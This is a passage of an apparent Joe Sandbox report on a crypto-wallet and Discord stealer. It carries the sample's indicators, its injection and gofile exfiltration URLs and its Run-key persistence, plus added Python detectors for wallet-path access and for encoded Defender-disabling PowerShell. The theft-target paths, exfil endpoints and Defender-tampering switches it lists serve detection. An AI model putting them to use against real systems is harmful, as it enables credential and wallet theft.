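The file-open list above shows a single process, WdlA0C4PkO.exe, reaching into Chrome and Firefox profile stores, six wallet data directories and four Discord builds, and doing so under C:\Users\Default and C:\Users\Public as well as the logged-on user's profile. No legitimate application opens another product's wallet file, let alone under profiles it does not run as; that cross-category, cross-profile pattern is what a sandbox signature such as "Tries to steal Crypto Currency Wallets" keys on. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample: it scores (process, path) file-open events with exactly that heuristic. The path patterns are lifted from the list above; the category names, the thresholds and the sample events (including the two benign controls) are this example's own constructions.

```python
import re
from collections import defaultdict

# Path fragments (matched case-insensitively) that a credential/wallet stealer reaches for.
# The fragments come from the file-open list in this report; the category labels are the
# example's own.
SENSITIVE_PATTERNS = {
    "browser": [
        r"\\Google\\Chrome\\User Data\\[^\\]+\\(Web Data|Login Data|History|Local Extension Settings)",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\",
    ],
    "wallet": [
        r"\\AppData\\Roaming\\Exodus\\exodus\.wallet",
        r"\\AppData\\Roaming\\Electrum\\wallets",
        r"\\AppData\\Roaming\\atomic\\Local Storage\\leveldb",
        r"\\AppData\\Roaming\\Coinomi\\Coinomi\\wallets",
        r"\\AppData\\Roaming\\com\.liberty\.jaxx\\IndexedDB\\",
        r"\\AppData\\Roaming\\Guarda\\Local Storage\\leveldb",
    ],
    "discord": [
        r"\\AppData\\Local\\discord(canary|ptb|development)?$",
    ],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats]
            for cat, pats in SENSITIVE_PATTERNS.items()}
PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.IGNORECASE)


def classify_access(path):
    """Return the sensitive-data category a path belongs to, or None."""
    for cat, regexes in COMPILED.items():
        if any(r.search(path) for r in regexes):
            return cat
    return None


def profile_of(path):
    """User profile name (lower-cased) a path lives under, or None."""
    m = PROFILE_RE.match(path)
    return m.group(1).lower() if m else None


def summarize(events):
    """events: iterable of (process_image, opened_path).
    Returns {process_image: {"categories": set, "profiles": set, "hits": int}}."""
    out = defaultdict(lambda: {"categories": set(), "profiles": set(), "hits": 0})
    for image, path in events:
        cat = classify_access(path)
        if cat is None:
            continue
        entry = out[image.lower()]
        entry["categories"].add(cat)
        entry["hits"] += 1
        prof = profile_of(path)
        if prof:
            entry["profiles"].add(prof)
    return dict(out)


def is_stealer_like(entry):
    """Heuristic (this example's threshold): a process that opens two or more data
    categories, or the same category under two or more user profiles, is flagged.
    A legitimate application only ever opens its own data under the current user."""
    return len(entry["categories"]) >= 2 or len(entry["profiles"]) >= 2


# Constructed events modelled on the file-open list above; not a log exported from the report.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\WdlA0C4PkO.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    (r"C:\Users\user\Desktop\WdlA0C4PkO.exe",
     r"C:\Users\Default\AppData\Roaming\Exodus\exodus.wallet"),
    (r"C:\Users\user\Desktop\WdlA0C4PkO.exe",
     r"C:\Users\Public\AppData\Roaming\Electrum\wallets"),
    (r"C:\Users\user\Desktop\WdlA0C4PkO.exe",
     r"C:\Users\user\AppData\Local\discordcanary"),
    # Benign controls: Chrome reading its own profile, Exodus reading its own wallet.
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    (r"C:\Users\user\AppData\Local\exodus\Exodus.exe",
     r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
]


def flag_processes(events=SAMPLE_EVENTS):
    """Sorted list of (lower-cased) process images that trip the heuristic."""
    return sorted(img for img, entry in summarize(events).items() if is_stealer_like(entry))


if __name__ == "__main__":
    for img, entry in summarize(SAMPLE_EVENTS).items():
        verdict = "FLAG" if is_stealer_like(entry) else "ok"
        print(f"{verdict:4} {img}  categories={sorted(entry['categories'])} "
              f"profiles={sorted(entry['profiles'])} hits={entry['hits']}")
```

Run over Sysmon event ID 11 or EDR file-access telemetry, the profile check alone is the cheap, low-noise part: a process that opens Exodus or Electrum data under C:\Users\Default (a template profile nobody logs into) has no benign explanation.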

Remote Access Functionality

Source: Yara match | File source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques with matching signatures; the number in parentheses is the signature count)

Execution: Windows Management Instrumentation (21), Command and Scripting Interpreter (12), PowerShell (2)
Persistence: DLL Side-Loading (1), Windows Service (1), Registry Run Keys / Startup Folder (1)
Privilege Escalation: DLL Side-Loading (1), Windows Service (1), Process Injection (12), Registry Run Keys / Startup Folder (1)
Defense Evasion: File and Directory Permissions Modification (1), Disable or Modify Tools (3), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (11), Install Root Certificate (1), Software Packing (1), DLL Side-Loading (1), Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (151), Process Injection (12)
Credential Access: OS Credential Dumping (1)
Discovery: File and Directory Discovery (1), System Information Discovery (24), Security Software Discovery (231), Process Discovery (2), Virtualization/Sandbox Evasion (151), Application Window Discovery (1), Remote System Discovery (1), System Network Configuration Discovery (1)
Collection: Data from Local System (31), Email Collection (1)
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (3)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no matching signatures
Behavior Graph
Behavior Graph ID: 1577903 | Sample: WdlA0C4PkO.exe | Startdate: 18/12/2024 | Architecture: WINDOWS | Score: 100
Bracketed numbers are the graph's per-process counters of created registry values and files.

Signatures on the start node: Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; Yara detected Skuld Stealer; 10 other signatures
DNS resolved from the start node: ip-api.com, api.ipify.org

Process tree:
WdlA0C4PkO.exe [2, 76]
    network: ip-api.com (208.95.112.1, ports 49708, 80, TUT-ASUS, United States); api.ipify.org (104.26.12.205, ports 443, 49707, CLOUDFLARENETUS, United States)
    dropped: C:\Users\user\...\SecurityHealthSystray.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
    signatures: Installs new ROOT certificates; Found many strings related to Crypto-Wallets (likely being stolen); Uses cmd line tools excessively to alter registry or file data; 11 other signatures
    -> powershell.exe
        dropped: C:\Users\user\AppData\...\a12sgnvo.cmdline (Unicode)
        -> csc.exe
            dropped: C:\Users\user\AppData\Local\...\a12sgnvo.dll (PE32)
            -> cvtres.exe
    -> powershell.exe [23]
        signatures: Loading BitLocker PowerShell Module
    -> powershell.exe [23]
    -> 12 other processes
SecurityHealthSystray.exe (started from the start node, not as a child of the sample)
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    -> conhost.exe
SecurityHealthSystray.exe (started from the start node, not as a child of the sample)
    -> conhost.exe

Antivirus, Machine Learning and Genetic Malware Detection
Source | Detection | Scanner | Label
WdlA0C4PkO.exe | 55% | ReversingLabs | Win64.Trojan.TMPNStealer
WdlA0C4PkO.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | 55% | ReversingLabs | Win64.Trojan.TMPNStealer
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://ip-api.com/json | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet | SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.microsoft | powershell.exe, 00000012.00000002.1664878909.000001FC918E5000.00000004.00000020.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmp | false | high
https://go.micro | powershell.exe, 00000012.00000002.1665126840.000001FC94145000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql: | SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
https://contoso.com/License | powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/Icon | powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.microsoft. | powershell.exe, 0000000C.00000002.1604710839.000001C99DBF0000.00000004.00000020.00020000.00000000.sdmp | false | high
https://github.com/Pester/Pester | powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmp | false | high
https://bugzilla.mo | WdlA0C4PkO.exe, 00000000.00000003.2046786886.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2055924100.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2007680510.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2009215764.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1684148367.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538095776.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.3355671817.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2075882669.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2402745424.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1539272178.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1988403621.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp | false | high
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON | SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discord.com/api/v9/users/ | SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
https://oneget.orgX | powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmp | false | high
https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626 | SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
https://aka.ms/pscore68 | powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmp | false | high
https://avatars.githubusercontent.com/u/145487845?v=4sqlite: | SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s | SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmp | false | high
https://oneget.org | powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmp | false | high
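Two of the SecurityHealthSystray.exe strings in the table above, -DisableIOAVProtection and -DisableScriptScanning, are Set-MpPreference switches. When such a call is handed to powershell.exe through -EncodedCommand, the switch names never appear in clear text in process-creation telemetry, only the base64 blob does. The Python below is an added example for this page, not code from the report or from the sample: it reverses the -EncodedCommand encoding (UTF-16LE text, then base64) and flags Set-MpPreference / Add-MpPreference calls that weaken Defender. The parameter list beyond the two switches seen above, and the three constructed command lines, are this example's own assumptions.

```python
import base64
import re

# Set-MpPreference / Add-MpPreference parameters that weaken Microsoft Defender.
# -DisableIOAVProtection and -DisableScriptScanning are the two seen as strings in
# SecurityHealthSystray.exe above; the rest are this example's own additions.
DEFENDER_TAMPER_PARAMS = {
    "-disablerealtimemonitoring", "-disableioavprotection", "-disablescriptscanning",
    "-disablebehaviormonitoring", "-disableblockatfirstseen",
    "-disableintrusionpreventionsystem", "-exclusionpath", "-exclusionprocess",
    "-exclusionextension", "-mapsreporting", "-submitsamplesconsent",
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the usual spellings.
ENC_FLAG_RE = re.compile(r"^-(e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)$",
                         re.IGNORECASE)
# One *-MpPreference call and its arguments, up to the next pipeline or statement separator.
MPPREF_RE = re.compile(r"(?:Set|Add)-MpPreference\b([^|;\r\n]*)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE), or None if the
    command line has no such flag or the payload does not decode."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG_RE.match(tok):
            blob = tokens[i + 1].strip('"\'')
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def defender_tampering(script):
    """Sorted list of tampering parameters passed to Set-/Add-MpPreference in a script."""
    if not script:
        return []
    found = set()
    for m in MPPREF_RE.finditer(script):
        for tok in m.group(1).split():
            if tok.lower() in DEFENDER_TAMPER_PARAMS:
                found.add(tok.lower())
    return sorted(found)


def encode_command(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (used to build the demo)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines for the demo; not taken from the report's process list.
TAMPER_SCRIPT = ('Set-MpPreference -DisableIOAVProtection $true -DisableScriptScanning $true; '
                 'Add-MpPreference -ExclusionPath "$env:APPDATA\\Microsoft\\Protect"')
BENIGN_SCRIPT = 'Get-Process | Where-Object { $_.CPU -gt 10 }'
SAMPLE_CMDLINES = [
    "powershell.exe -ExecutionPolicy Bypass -NoProfile -EncodedCommand " + encode_command(TAMPER_SCRIPT),
    "powershell.exe -nop -w hidden -enc " + encode_command(BENIGN_SCRIPT),
    "powershell.exe -Command Get-Date",
]


def triage(cmdlines=SAMPLE_CMDLINES):
    """Map each command line to the Defender-tampering parameters hidden in it."""
    return {c: defender_tampering(decode_encoded_command(c)) for c in cmdlines}


if __name__ == "__main__":
    for cmd, hits in triage().items():
        print("ALERT" if hits else "ok   ", hits, cmd[:60] + ("..." if len(cmd) > 60 else ""))
```

The decoder deliberately accepts the short flag spellings (-e, -enc, -ec) that loaders favour; a rule that only matches the literal -EncodedCommand misses most real-world command lines. Matching on the decoded text rather than the raw command line is also what makes the exclusion-path case catchable: the directory the sample persists in appears only after decoding.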
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1577903
                                                                                    Start date and time:2024-12-18 21:24:05 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 9m 54s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 29
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:WdlA0C4PkO.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:2b344d8644f0d502c4c8370ef8674a51.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.adwa.spyw.expl.evad.winEXE@38/25@2/2
                                                                                    EGA Information:Failed
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 11
                                                                                    • Number of non-executed functions: 6
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: WdlA0C4PkO.exe
Time | Type | Description
15:25:04 | API Interceptor | 6x Sleep call for process: WMIC.exe modified
15:25:09 | API Interceptor | 76x Sleep call for process: powershell.exe modified
20:25:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
20:25:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | xt.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | roblox1.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
208.95.112.1 | roblox.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
208.95.112.1 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | ip-api.com/json
208.95.112.1 | x.ps1 | malicious | Quasar | ip-api.com/json/
208.95.112.1 | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Shipping Bill6239999 dated 13122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Creal.exe | malicious | Blackshades | ip-api.com/json/
208.95.112.1 | factura 000601.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | xt.exe | malicious | XWorm | 208.95.112.1
ip-api.com | roblox1.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
ip-api.com | roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
ip-api.com | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
ip-api.com | x.ps1 | malicious | Quasar | 208.95.112.1
ip-api.com | https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
ip-api.com | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Shipping Bill6239999 dated 13122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Creal.exe | malicious | Blackshades | 208.95.112.1
api.ipify.org | cali.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Awb 4586109146.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
api.ipify.org | PO 0309494059506060609696007.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
api.ipify.org | Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | winws1.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | KASHI SHIP PARTICULARS.pdf.scr.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | PO.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
api.ipify.org | rDOC24INV0616.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91 | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | PqCznDthHP.exe | malicious | Edge Stealer | 104.26.13.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://ine95l4am7-secondary.z5.web.core.windows.net/ | malicious | Unknown | 172.67.218.206
CLOUDFLARENETUS | rK0CtrtVrl.exe | malicious | LummaC, Stealc | 104.21.64.80
CLOUDFLARENETUS | https://muse.krazzykriss.com/BbWGOn6X5VNhl7wIMoGqGHbc4hg/hLYIPI2xCimX9Bg/l+JXfZf7 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | NHEXQatKdE.exe | malicious | LummaC | 172.67.179.109
CLOUDFLARENETUS | CefJcYwgWs.exe | malicious | LummaC, Stealc | 104.21.64.80
CLOUDFLARENETUS | tdMnK5A1pe.exe | malicious | LummaC | 104.21.64.80
CLOUDFLARENETUS | 3DI3mOIlxE.exe | malicious | LummaC, Stealc | 104.21.64.80
CLOUDFLARENETUS | pPizCGDvrx.exe | malicious | LummaC | 172.67.179.109
CLOUDFLARENETUS | tasktow.exe | malicious | Unknown | 104.21.1.82
CLOUDFLARENETUS | https://www.asda.com@hnvs.xyz/asda-christmas-prizes | malicious | Unknown | 172.66.47.201
TUT-ASUS | xt.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | roblox1.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
TUT-ASUS | roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
TUT-ASUS | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
TUT-ASUS | x.ps1 | malicious | Quasar | 208.95.112.1
TUT-ASUS | https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
TUT-ASUS | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Shipping Bill6239999 dated 13122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Creal.exe | malicious | Blackshades | 208.95.112.1
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):510877
                                                                                    Entropy (8bit):7.915507832806752
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Z46FGp7sm/BfcQYMqB7XbeF3jUczuXlnOpV7nsZ:O6FyJzYMuAT/zKyS
                                                                                    MD5:407CA0BFEE41829AD31877B5CCB50608
                                                                                    SHA1:FD2381FE00292B6D5ABEAC239C7AE98BE26D7C69
                                                                                    SHA-256:41A07A2E43CDA5F20CDBBB4C3BFD57FF712E2EDB3DDB3B4489703214393750A1
                                                                                    SHA-512:86E1052B4120CC4F8E1B49010AF8440A3B55AAAC13DB7073A2246A354141AAAAD59FB540E798E1B663401D3087FD7DAD570952CC37C778D693FDBA9E4BF5AF3A
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4a2, 9 symbols, created Wed Dec 18 22:25:20 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1352
                                                                                    Entropy (8bit):4.015441904564387
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HPZ29c+jwZrwBwZH3wKpwZ6NwI+ycuZhNOqakSpbPNnqSIEgd:vgjwZrwBwZgKpwZ6m1ulOqa3pRqSIP
                                                                                    MD5:255BE4ACB319F0602BB2B92653FD12FE
                                                                                    SHA1:04AA8767F0954C995B0AED7C00E763B9BE9D2B1E
                                                                                    SHA-256:9B18777A74E8666A1AD37B37F0115BD631A5DC9F744A18CB493EA1F834846D41
